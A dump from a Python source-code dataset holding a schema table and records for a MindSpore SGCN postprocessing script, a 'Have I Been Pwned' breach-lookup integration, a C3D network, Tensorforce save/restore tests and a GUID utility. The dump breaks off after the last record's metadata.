Dataset schema (one record per source file; "nullable" marks columns that may be null):

| column | type | range / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 6 to 782k |
| ext | string | 7 classes |
| lang | string | 1 class (Python) |
| max_stars_repo_path | string | length 4 to 237 |
| max_stars_repo_name | string | length 6 to 72 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | |
| max_stars_count | int64, nullable | 1 to 53k |
| max_stars_repo_stars_event_min_datetime | string, nullable | length 24 |
| max_stars_repo_stars_event_max_datetime | string, nullable | length 24 |
| max_issues_repo_path | string | length 4 to 184 |
| max_issues_repo_name | string | length 6 to 72 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | |
| max_issues_count | int64, nullable | 1 to 27.1k |
| max_issues_repo_issues_event_min_datetime | string, nullable | length 24 |
| max_issues_repo_issues_event_max_datetime | string, nullable | length 24 |
| max_forks_repo_path | string | length 4 to 184 |
| max_forks_repo_name | string | length 6 to 72 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | |
| max_forks_count | int64, nullable | 1 to 12.2k |
| max_forks_repo_forks_event_min_datetime | string, nullable | length 24 |
| max_forks_repo_forks_event_max_datetime | string, nullable | length 24 |
| content | string | length 6 to 782k |
| avg_line_length | float64 | 2.75 to 664k |
| max_line_length | int64 | 5 to 782k |
| alphanum_fraction | float64 | 0 to 1 |
--- record ---
hexsha: 8a78745915eb3a4aaf90865a024b4d8bafd46ca7 | size: 5,151 | ext: py | lang: Python
path: research/gnn/sgcn/postprocess.py | repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | licenses: ["Apache-2.0"] (same for stars/issues/forks)
max_stars_count: 1 (2021-11-18T08:17:44.000Z to 2021-11-18T08:17:44.000Z) | max_issues_count: null | max_forks_count: 2 (2019-09-01T06:17:04.000Z to 2019-10-04T08:39:45.000Z)
content:
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
postprocess.
"""
import os
import argparse
import numpy as np
from src.ms_utils import calculate_auc
from mindspore import context, load_checkpoint
def softmax(x):
t_max = np.max(x, axis=1, keepdims=True) # returns max of each row and keeps same dims
e_x = np.exp(x - t_max) # subtracts each row with its max value
t_sum = np.sum(e_x, axis=1, keepdims=True) # returns sum of each row and keeps same dims
f_x = e_x / t_sum
return f_x
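# A worked example of the stable softmax above (illustrative numbers, not from
# the dataset): softmax(np.array([[1.0, 2.0, 3.0]])) ~= [[0.090, 0.245, 0.665]].
# Subtracting the row max before np.exp changes nothing mathematically but
# prevents overflow for large logits.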
def score_model(preds, test_pos, test_neg, weight, bias):
"""
Score the model on the test set edges in each epoch.
Args:
        preds (ndarray): Node embeddings produced by the network.
        test_pos (list): Positive test set edges.
        test_neg (list): Negative test set edges.
        weight (ndarray): Regression weight matrix from the checkpoint.
        bias (ndarray): Regression bias from the checkpoint.
Returns:
auc(Float32): AUC result.
f1(Float32): F1-Score result.
"""
score_positive_edges = np.array(test_pos, dtype=np.int32).T
score_negative_edges = np.array(test_neg, dtype=np.int32).T
test_positive_z = np.concatenate((preds[score_positive_edges[0, :], :],
preds[score_positive_edges[1, :], :]), axis=1)
test_negative_z = np.concatenate((preds[score_negative_edges[0, :], :],
preds[score_negative_edges[1, :], :]), axis=1)
scores = np.dot(np.concatenate((test_positive_z, test_negative_z), axis=0), weight) + bias
probability_scores = np.exp(softmax(scores))
predictions = probability_scores[:, 0]/probability_scores[:, 0:2].sum(1)
targets = [0]*len(test_pos) + [1]*len(test_neg)
auc, f1 = calculate_auc(targets, predictions)
return auc, f1
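# Reading of the scoring above: scores has shape (num_pos + num_neg, 3); only
# the first two logit columns are renormalized, so predictions holds the
# positive-class score, evaluated against targets of 0 (positive edge) and
# 1 (negative edge).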
def get_acc():
"""get infer Accuracy."""
parser = argparse.ArgumentParser(description='postprocess')
parser.add_argument('--dataset_name', type=str, default='bitcoin-otc', choices=['bitcoin-otc', 'bitcoin-alpha'],
help='dataset name')
parser.add_argument('--result_path', type=str, default='./ascend310_infer/input/', help='result Files')
parser.add_argument('--label_path', type=str, default='', help='y_test npy Files')
parser.add_argument('--mask_path', type=str, default='', help='test_mask npy Files')
parser.add_argument("--checkpoint_file", type=str, default='sgcn_alpha_f1.ckpt', help="Checkpoint file path.")
parser.add_argument("--edge_path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--features-path", nargs="?",
default="./input/bitcoin_alpha.csv", help="Edge list csv.")
parser.add_argument("--test-size", type=float,
default=0.2, help="Test dataset size. Default is 0.2.")
parser.add_argument("--seed", type=int, default=42,
help="Random seed for sklearn pre-training. Default is 42.")
parser.add_argument("--spectral-features", default=True, dest="spectral_features", action="store_true")
parser.add_argument("--reduction-iterations", type=int,
default=30, help="Number of SVD iterations. Default is 30.")
parser.add_argument("--reduction-dimensions", type=int,
default=64, help="Number of SVD feature extraction dimensions. Default is 64.")
args_opt = parser.parse_args()
# Runtime
context.set_context(mode=context.GRAPH_MODE, device_target='Ascend', device_id=0)
# Create network
test_pos = np.load(os.path.join(args_opt.result_path, 'pos_test.npy'))
test_neg = np.load(os.path.join(args_opt.result_path, 'neg_test.npy'))
# Load parameters from checkpoint into network
param_dict = load_checkpoint(args_opt.checkpoint_file)
print(type(param_dict))
print(param_dict)
print(type(param_dict['regression_weights']))
print(param_dict['regression_weights'])
# load_param_into_net(net, param_dict)
pred = np.fromfile('./result_Files/repos_0.bin', np.float32)
if args_opt.dataset_name == 'bitcoin-otc':
pred = pred.reshape(5881, 64)
else:
pred = pred.reshape(3783, 64)
auc, f1 = score_model(pred, test_pos, test_neg, param_dict['regression_weights'].asnumpy(),
param_dict['regression_bias'].asnumpy())
print("Test set results:", "auc=", "{:.5f}".format(auc), "f1=", "{:.5f}".format(f1))
if __name__ == '__main__':
get_acc()
avg_line_length: 48.140187 | max_line_length: 117 | alphanum_fraction: 0.644729
--- record ---
hexsha: 0a10152195fb9a20741a86fb44035860fed300f4 | size: 12,017 | ext: py | lang: Python
path: Packs/Pwned/Integrations/PwnedV2/PwnedV2.py | repo: diCagri/content @ c532c50b213e6dddb8ae6a378d6d09198e08fc9f | licenses: ["MIT"] (same for stars/issues/forks)
max_stars_count: 799 (2016-08-02T06:43:14.000Z to 2022-03-31T11:10:11.000Z) | max_issues_count: 9,317 (2016-08-07T19:00:51.000Z to 2022-03-31T21:56:04.000Z) | max_forks_count: 1,297 (2016-08-04T13:59:00.000Z to 2022-03-31T23:43:06.000Z)
content:
from CommonServerPython import *
''' IMPORTS '''
import re
import requests
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBALS/PARAMS '''
VENDOR = 'Have I Been Pwned? V2'
MAX_RETRY_ALLOWED = demisto.params().get('max_retry_time', -1)
API_KEY = demisto.params().get('api_key')
USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = 'https://haveibeenpwned.com/api/v3'
HEADERS = {
'hibp-api-key': API_KEY,
'user-agent': 'DBOT-API',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
DEFAULT_DBOT_SCORE_EMAIL = 2 if demisto.params().get('default_dbot_score_email') == 'SUSPICIOUS' else 3
DEFAULT_DBOT_SCORE_DOMAIN = 2 if demisto.params().get('default_dbot_score_domain') == 'SUSPICIOUS' else 3
SUFFIXES = {
"email": '/breachedaccount/',
"domain": '/breaches?domain=',
"username": '/breachedaccount/',
"paste": '/pasteaccount/',
"email_truncate_verified": '?truncateResponse=false&includeUnverified=true',
"domain_truncate_verified": '&truncateResponse=false&includeUnverified=true',
"username_truncate_verified": '?truncateResponse=false&includeUnverified=true'
}
RETRIES_END_TIME = datetime.min
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, params=None, data=None):
while True:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
params=params,
data=data,
headers=HEADERS
)
if res.status_code != 429:
# Rate limit response code
break
if datetime.now() > RETRIES_END_TIME:
            return_error('Max retry time has been exceeded.')
wait_regex = re.search(r'\d+', res.json()['message'])
if wait_regex:
wait_amount = wait_regex.group()
else:
            demisto.error('Failed extracting wait time, will use default (5). Res body: {}'.format(res.text))
wait_amount = 5
if datetime.now() + timedelta(seconds=int(wait_amount)) > RETRIES_END_TIME:
            return_error('Max retry time has been exceeded.')
time.sleep(int(wait_amount))
if res.status_code == 404:
return None
    if res.status_code != 200:
        if res.status_code != 401:
demisto.error(
'Error in API call to Pwned Integration [%d]. Full text: %s' % (res.status_code, res.text))
return_error('Error in API call to Pwned Integration [%d] - %s' % (res.status_code, res.reason))
return None
return res.json()
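# Illustrative retry flow (hypothetical payload): a 429 response whose body is
# {"message": "Rate limit is exceeded. Try again in 3 seconds."} makes the loop
# above sleep 3 seconds and retry, until RETRIES_END_TIME would be exceeded.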
def html_description_to_human_readable(breach_description):
"""
Converting from html description to hr
:param breach_description: Description of breach from API response
:return: Description string that altered HTML urls to clickable urls
for better readability in war-room
"""
html_link_pattern = re.compile('<a href="(.+?)"(.+?)>(.+?)</a>')
patterns_found = html_link_pattern.findall(breach_description)
for link in patterns_found:
html_actual_address = link[0]
html_readable_name = link[2]
link_from_desc = '[' + html_readable_name + ']' + '(' + html_actual_address + ')'
breach_description = re.sub(html_link_pattern, link_from_desc, breach_description, count=1)
return breach_description
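# Example (illustrative): '<a href="https://x.io" rel="noopener">X leak</a>'
# becomes '[X leak](https://x.io)', which renders as a clickable link in the
# war room markdown.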
def data_to_markdown(query_type, query_arg, api_res, api_paste_res=None):
records_found = False
md = '### Have I Been Pwned query for ' + query_type.lower() + ': *' + query_arg + '*\n'
if api_res:
records_found = True
for breach in api_res:
verified_breach = 'Verified' if breach['IsVerified'] else 'Unverified'
md += '#### ' + breach['Title'] + ' (' + breach['Domain'] + '): ' + str(breach['PwnCount']) + \
' records breached [' + verified_breach + ' breach]\n'
md += 'Date: **' + breach['BreachDate'] + '**\n\n'
md += html_description_to_human_readable(breach['Description']) + '\n'
md += 'Data breached: **' + ','.join(breach['DataClasses']) + '**\n'
if api_paste_res:
records_found = True
pastes_list = []
for paste_breach in api_paste_res:
paste_entry = \
{
'Source': paste_breach['Source'],
'Title': paste_breach['Title'],
'ID': paste_breach['Id'],
'Date': '',
'Amount of emails in paste': str(paste_breach['EmailCount'])
}
if paste_breach['Date']:
paste_entry['Date'] = paste_breach['Date'].split('T')[0]
pastes_list.append(paste_entry)
md += tableToMarkdown('The email address was found in the following "Pastes":',
pastes_list,
['ID', 'Title', 'Date', 'Source', 'Amount of emails in paste'])
if not records_found:
md += 'No records found'
return md
def create_dbot_score_dictionary(indicator_value, indicator_type, dbot_score):
return {
'Indicator': indicator_value,
'Type': indicator_type,
'Vendor': VENDOR,
'Score': dbot_score
}
def create_context_entry(context_type, context_main_value, comp_sites, comp_pastes, malicious_score):
context_dict = dict() # dict
if context_type == 'email':
context_dict['Address'] = context_main_value
else:
context_dict['Name'] = context_main_value
context_dict['Pwned-V2'] = {
'Compromised': {
'Vendor': VENDOR,
'Reporters': ', '.join(comp_sites + comp_pastes)
}
}
if malicious_score == 3:
context_dict['Malicious'] = add_malicious_to_context(context_type)
return context_dict
def add_malicious_to_context(malicious_type):
return {
'Vendor': VENDOR,
'Description': 'The ' + malicious_type + ' has been compromised'
}
def email_to_entry_context(email, api_email_res, api_paste_res):
dbot_score = 0
comp_email = dict() # type: dict
comp_sites = sorted([item['Title'] for item in api_email_res])
comp_pastes = sorted(set(item['Source'] for item in api_paste_res))
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_EMAIL
email_context = create_context_entry('email', email, comp_sites, comp_pastes, DEFAULT_DBOT_SCORE_EMAIL)
comp_email[outputPaths['email']] = email_context
comp_email['DBotScore'] = create_dbot_score_dictionary(email, 'email', dbot_score)
return comp_email
def domain_to_entry_context(domain, api_res):
comp_sites = [item['Title'] for item in api_res]
comp_sites = sorted(comp_sites)
comp_domain = dict() # type: dict
dbot_score = 0
if len(comp_sites) > 0:
dbot_score = DEFAULT_DBOT_SCORE_DOMAIN
domain_context = create_context_entry('domain', domain, comp_sites, [], DEFAULT_DBOT_SCORE_DOMAIN)
comp_domain[outputPaths['domain']] = domain_context
comp_domain['DBotScore'] = create_dbot_score_dictionary(domain, 'domain', dbot_score)
return comp_domain
def set_retry_end_time():
global RETRIES_END_TIME
if MAX_RETRY_ALLOWED != -1:
RETRIES_END_TIME = datetime.now() + timedelta(seconds=int(MAX_RETRY_ALLOWED))
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module(args_dict):
"""
If the http request was successful the test will return OK
:return: 3 arrays of outputs
"""
http_request('GET', SUFFIXES.get("username", '') + 'test')
return ['ok'], [None], [None]
def pwned_email_command(args_dict):
"""
    Execute the pwned request for an email list. To support list input, the function returns 3 lists of outputs.
:param args_dict: the demisto argument - in this case the email list is needed
:return: 3 arrays of outputs
"""
email_list = argToList(args_dict.get('email', ''))
api_email_res_list, api_paste_res_list = pwned_email(email_list)
md_list = []
ec_list = []
for email, api_email_res, api_paste_res in zip(email_list, api_email_res_list, api_paste_res_list):
md_list.append(data_to_markdown('Email', email, api_email_res, api_paste_res))
ec_list.append(email_to_entry_context(email, api_email_res or [], api_paste_res or []))
return md_list, ec_list, api_email_res_list
def pwned_email(email_list):
"""
Executing the http requests
:param email_list: the email list that needed for the http requests
:return: 2 arrays of http requests outputs
"""
api_email_res_list = []
api_paste_res_list = []
for email in email_list:
email_suffix = SUFFIXES.get("email") + email + SUFFIXES.get("email_truncate_verified")
paste_suffix = SUFFIXES.get("paste") + email
api_email_res_list.append(http_request('GET', url_suffix=email_suffix))
api_paste_res_list.append(http_request('GET', url_suffix=paste_suffix))
return api_email_res_list, api_paste_res_list
def pwned_domain_command(args_dict):
"""
    Execute the pwned request for a domain list. To support list input, the function returns 3 lists of outputs.
:param args_dict: the demisto argument - in this case the domain list is needed
:return: 3 arrays of outputs
"""
domain_list = argToList(args_dict.get('domain', ''))
api_res_list = pwned_domain(domain_list)
md_list = []
ec_list = []
for domain, api_res in zip(domain_list, api_res_list):
md_list.append(data_to_markdown('Domain', domain, api_res))
ec_list.append(domain_to_entry_context(domain, api_res or []))
return md_list, ec_list, api_res_list
def pwned_domain(domain_list):
"""
Executing the http request
:param domain_list: the domains list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for domain in domain_list:
suffix = SUFFIXES.get("domain") + domain + SUFFIXES.get("domain_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
def pwned_username_command(args_dict):
"""
    Execute the pwned request for a username list. To support list input, the function returns 3 lists of outputs.
:param args_dict: the demisto argument - in this case the username list is needed
:return: 3 arrays of outputs
"""
username_list = argToList(args_dict.get('username', ''))
api_res_list = pwned_username(username_list)
md_list = []
ec_list = []
for username, api_res in zip(username_list, api_res_list):
md_list.append(data_to_markdown('Username', username, api_res))
ec_list.append(domain_to_entry_context(username, api_res or []))
return md_list, ec_list, api_res_list
def pwned_username(username_list):
"""
Executing the http request
:param username_list: the username list that needed for the http requests
:return: an array of http requests outputs
"""
api_res_list = []
for username in username_list:
suffix = SUFFIXES.get("username") + username + SUFFIXES.get("username_truncate_verified")
api_res_list.append(http_request('GET', url_suffix=suffix))
return api_res_list
command = demisto.command()
LOG('Command being called is: {}'.format(command))
try:
handle_proxy()
set_retry_end_time()
commands = {
'test-module': test_module,
'email': pwned_email_command,
'pwned-email': pwned_email_command,
'domain': pwned_domain_command,
'pwned-domain': pwned_domain_command,
'pwned-username': pwned_username_command
}
if command in commands:
md_list, ec_list, api_email_res_list = commands[command](demisto.args())
for md, ec, api_paste_res in zip(md_list, ec_list, api_email_res_list):
return_outputs(md, ec, api_paste_res)
# Log exceptions
except Exception as e:
return_error(str(e))
avg_line_length: 34.042493 | max_line_length: 120 | alphanum_fraction: 0.659732
--- record ---
hexsha: 0a8fdb2b5cc10e441111eda628478417245011ef | size: 5,283 | ext: py | lang: Python
path: official/cv/c3d/src/c3d_model.py | repo: leelige/mindspore @ 5199e05ba3888963473f2b07da3f7bca5b9ef6dc | licenses: ["Apache-2.0"] (same for stars/issues/forks)
max_stars_count: 77 (2021-10-15T08:32:37.000Z to 2022-03-30T13:09:11.000Z) | max_issues_count: 3 (2021-10-30T14:44:57.000Z to 2022-02-14T06:57:57.000Z) | max_forks_count: 24 (2021-10-15T08:32:45.000Z to 2022-03-24T18:45:20.000Z)
content:
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import math
import mindspore.nn as nn
import mindspore.ops as P
from mindspore.common import initializer as init
from src.utils import default_recurisive_init, KaimingNormal
class C3D(nn.Cell):
"""
C3D network definition.
Args:
num_classes (int): Class numbers. Default: 1000.
Returns:
Tensor, infer output tensor.
Examples:
>>> C3D(num_classes=1000)
"""
def __init__(self, num_classes=1000):
super(C3D, self).__init__()
self.conv1 = nn.Conv3d(in_channels=3, out_channels=64, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool1 = P.MaxPool3D(kernel_size=(1, 2, 2), strides=(1, 2, 2), pad_mode='same')
self.conv2 = nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool2 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv3a = nn.Conv3d(in_channels=128, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv3b = nn.Conv3d(in_channels=256, out_channels=256, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool3 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv4a = nn.Conv3d(in_channels=256, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv4b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool4 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.conv5a = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.conv5b = nn.Conv3d(in_channels=512, out_channels=512, kernel_size=(3, 3, 3),
padding=(1, 1, 1, 1, 1, 1), pad_mode='pad', has_bias=True)
self.pool5 = P.MaxPool3D(kernel_size=(2, 2, 2), strides=(2, 2, 2), pad_mode='same')
self.fc6 = nn.Dense(in_channels=8192, out_channels=4096)
self.fc7 = nn.Dense(in_channels=4096, out_channels=4096)
self.fc8 = nn.Dense(in_channels=4096, out_channels=num_classes, bias_init=init.Normal(0.02))
self.dropout = nn.Dropout(keep_prob=0.5)
self.relu = nn.ReLU()
self.pad = nn.Pad(paddings=((0, 0), (0, 0), (1, 0), (1, 0)), mode="CONSTANT")
self.__init_weight()
def __init_weight(self):
default_recurisive_init(self)
self.custom_init_weight()
def construct(self, x):
x = self.relu(self.conv1(x))
x = self.pool1(x)
x = self.relu(self.conv2(x))
x = self.pool2(x)
x = self.relu(self.conv3a(x))
x = self.relu(self.conv3b(x))
x = self.pool3(x)
x = self.relu(self.conv4a(x))
x = self.relu(self.conv4b(x))
x = self.pool4(x)
x = self.relu(self.conv5a(x))
x = self.relu(self.conv5b(x))
x = x.view(-1, 512 * 2, 7, 7)
x = self.pad(x)
x = x.view(-1, 512, 2, 8, 8)
x = self.pool5(x)
x = x.view(-1, 8192)
x = self.relu(self.fc6(x))
x = self.dropout(x)
x = self.relu(self.fc7(x))
x = self.dropout(x)
logits = self.fc8(x)
return logits
def custom_init_weight(self):
"""
Init the weight of Conv3d and Dense in the net.
"""
for _, cell in self.cells_and_names():
if isinstance(cell, nn.Conv3d):
cell.weight.set_data(init.initializer(
KaimingNormal(a=math.sqrt(5), mode='fan_out', nonlinearity='relu'),
cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
elif isinstance(cell, nn.Dense):
cell.weight.set_data(init.initializer(
init.Normal(0.01), cell.weight.shape, cell.weight.dtype))
if cell.bias is not None:
cell.bias.set_data(init.initializer(
'zeros', cell.bias.shape, cell.bias.dtype))
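# Illustrative usage (assumes the standard C3D clip layout of
# batch x channel x depth x height x width, i.e. (N, 3, 16, 112, 112),
# which is what the 8192-input fc6 layer above implies):
#   net = C3D(num_classes=101)
#   logits = net(Tensor(np.zeros((1, 3, 16, 112, 112), np.float32)))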
avg_line_length: 40.638462 | max_line_length: 100 | alphanum_fraction: 0.570509
--- record ---
hexsha: 7c2f595fee4e21dc84c6666b03b2174e6d5731e0 | size: 8,108 | ext: py | lang: Python
path: tensorforce/tests/test_model_save_restore.py | repo: gian1312/suchen @ df863140fd8df1ac2e195cbdfa4756f09f962270 | licenses: ["Apache-2.0"] (same for stars/issues/forks)
max_stars_count: null | max_issues_count: null | max_forks_count: 1 (2019-11-29T12:28:33.000Z to 2019-11-29T12:28:33.000Z)
content:
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import unittest
import pytest
from tensorforce import TensorForceError
from tensorforce.core.networks import LayeredNetwork
from tensorforce.models import DistributionModel
from tensorforce.tests.minimal_test import MinimalTest
from tensorforce.agents import PPOAgent
from tensorforce.execution import Runner
import tensorflow as tf
import numpy as np
from tensorforce.util import SavableComponent
import os
class SavableNetwork(LayeredNetwork, SavableComponent):
"""
Minimal implementation of a Network that can be saved and restored independently of the Model.
"""
def get_savable_variables(self):
return super(SavableNetwork, self).get_variables(include_nontrainable=False)
def _get_base_variable_scope(self):
return self.apply.variable_scope_name
def create_environment(spec):
return MinimalTest(spec)
def create_agent(environment, network_spec):
return PPOAgent(
update_mode=dict(
unit='episodes',
batch_size=4,
frequency=4
),
memory=dict(
type='latest',
include_next_states=False,
capacity=100
),
step_optimizer=dict(
type='adam',
learning_rate=1e-3
),
subsampling_fraction=0.3,
optimization_steps=20,
states=environment.states,
actions=environment.actions,
network=network_spec
)
class TestModelSaveRestore(unittest.TestCase):
@pytest.fixture(autouse=True)
def initdir(self, tmpdir):
tmpdir.chdir()
self._tmp_dir_path = str(tmpdir)
print("Using %s" % (self._tmp_dir_path, ))
def test_save_restore(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [
dict(type='dense', size=32)
]
agent = create_agent(environment, network_spec)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
save_path = agent.model.save(directory=self._tmp_dir_path + "/model")
print("Saved at: %s" % (save_path,))
runner.close()
agent = create_agent(environment, network_spec)
agent.model.restore(directory="", file=save_path)
restored_model_values = agent.model.session.run(agent.model.get_variables(
include_submodules=True,
include_nontrainable=False
))
assert len(model_values) == len(restored_model_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(model_values, restored_model_values)])
agent.close()
def test_save_network(self):
"""
Test to validate that calls to save and restore of a SavableComponent successfully save and restore the
component's state.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=1)]
)
agent = create_agent(environment, network_spec)
assert isinstance(agent.model.network, SavableComponent)
runner = Runner(agent=agent, environment=environment)
runner.run(episodes=100)
network_values = agent.model.session.run(agent.model.network.get_variables())
distribution = next(iter(agent.model.distributions.values()))
distribution_values = agent.model.session.run(distribution.get_variables())
save_path = self._tmp_dir_path + "/network"
agent.model.save_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
runner.close()
assert os.path.isfile(save_path + ".data-00000-of-00001")
assert os.path.isfile(save_path + ".index")
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=DistributionModel.COMPONENT_NETWORK, save_path=save_path)
# Ensure only the network variables are loaded
restored_network_values = agent.model.session.run(agent.model.network.get_variables(include_nontrainable=True))
distribution = next(iter(agent.model.distributions.values()))
restored_distribution_values = agent.model.session.run(distribution.get_variables())
assert len(restored_network_values) == len(network_values)
assert all([np.array_equal(v1, v2) for v1, v2 in zip(network_values, restored_network_values)])
assert len(restored_distribution_values) == len(distribution_values)
assert not all([np.array_equal(v1, v2) for v1, v2 in zip(distribution_values, restored_distribution_values)])
agent.close()
environment.close()
def test_pretrain_network(self):
"""
Simulates training outside of Tensorforce and then loading the parameters in the agent's network.
"""
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
size = environment.states["shape"]
output_size = 1
save_path = self._tmp_dir_path + "/network"
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype=environment.states["type"], shape=[None, size])
layer = tf.layers.Dense(units=output_size)
y = layer(x)
y_ = tf.placeholder(dtype=environment.states["type"], shape=[None, output_size])
loss = tf.losses.mean_squared_error(y_, y)
optimizer = tf.train.AdamOptimizer(learning_rate=0.1)
train_step = optimizer.minimize(loss)
batch_size = 64
with tf.Session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(100):
batch = np.random.random([batch_size, size])
correct = np.ones(shape=[batch.shape[0], output_size])
loss_value, _ = sess.run([loss, train_step], {x: batch, y_: correct})
if epoch % 10 == 0:
print("epoch %d: %f" % (epoch, loss_value))
var_map = {
"dense0/apply/linear/apply/W:0": layer.kernel,
"dense0/apply/linear/apply/b:0": layer.bias
}
saver = tf.train.Saver(var_list=var_map)
saver.save(sess=sess, write_meta_graph=False, save_path=save_path)
network_spec = dict(
type=SavableNetwork,
layers=[dict(type='dense', size=output_size)],
)
agent = create_agent(environment, network_spec)
agent.model.restore_component(component_name=agent.model.COMPONENT_NETWORK, save_path=save_path)
agent.close()
def test_non_savable_component(self):
environment_spec = {"float": ()}
environment = create_environment(environment_spec)
network_spec = [dict(type='dense', size=32)]
agent = create_agent(environment, network_spec)
expected_message = "Component network must implement SavableComponent but is "
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.save_component(component_name="network", save_path=self._tmp_dir_path + "/network")
assert expected_message in str(excinfo.value)
with pytest.raises(TensorForceError) as excinfo:
agent.model.restore_component(component_name="non-existent", save_path=self._tmp_dir_path + "/network")
assert "Component non-existent must implement SavableComponent but is None" == str(excinfo.value)
agent.close()
avg_line_length: 39.940887 | max_line_length: 119 | alphanum_fraction: 0.662309
--- record ---
hexsha: 7c2f74f5570ad8ece2d2a501cd63b62951484c2c | size: 844 | ext: py | lang: Python
path: guid.py | repo: lihuiba/SoftSAN @ 1b8ab2cae92b7aac34211909b27d4ebe595275d7 | licenses: ["Apache-2.0"] (same for stars/issues/forks)
max_stars_count: 1 (2015-08-02T09:53:18.000Z to 2015-08-02T09:53:18.000Z) | max_issues_count: null | max_forks_count: 2 (2018-03-21T04:59:50.000Z to 2019-12-03T15:54:17.000Z)
content:
import random
import messages_pb2 as msg
def assign(x, y):
    x.a = y.a
    x.b = y.b
    x.c = y.c
    x.d = y.d
def isZero(x):
    return x.a == 0 and x.b == 0 and x.c == 0 and x.d == 0
def setZero(x):
    x.a = 0
    x.b = 0
    x.c = 0
    x.d = 0
def toStr(x):
    return "%08x-%08x-%08x-%08x" % (x.a, x.b, x.c, x.d)
def toTuple(x):
    return (x.a, x.b, x.c, x.d)
def fromTuple(x):
    ret = msg.Guid()
    ret.a = x[0]
    ret.b = x[1]
    ret.c = x[2]
    ret.d = x[3]
    return ret
def generate(guid=None):
    ret = guid or msg.Guid()
    ret.a = random.randint(0, 0xffffffff)
    ret.b = random.randint(0, 0xffffffff)
    ret.c = random.randint(0, 0xffffffff)
    ret.d = random.randint(0, 0xffffffff)
    return ret
def fromStr(s):
    ret = msg.Guid()
    parts = s.split('-')
    ret.a = int(parts[0], 16)
    ret.b = int(parts[1], 16)
    ret.c = int(parts[2], 16)
    ret.d = int(parts[3], 16)
    return ret
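# Round-trip sketch (illustrative): s = toStr(generate()) produces a string
# like "1f2e3d4c-0000abcd-deadbeef-00000001", and fromStr(s) parses it back
# into an equal Guid; toTuple/fromTuple give the same guarantee for tuples.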
avg_line_length: 19.181818 | max_line_length: 55 | alphanum_fraction: 0.562796
--- record ---
hexsha: 861c79331c252b7937573a42f8e033c57c978cd9 | size: 6,138 | ext: py | lang: Python
path: oneflow/python/test/ops/test_l1loss.py (same for stars/issues/forks)
max_stars_count: 2 (2021-09-10T00:19:49.000Z to 2021-11-16T11:27:20.000Z) | stars repo: wanghongsheng01/framework_enflame @ debf613e05e3f5ea8084c3e79b60d0dd9e349526 | licenses: ["Apache-2.0"]
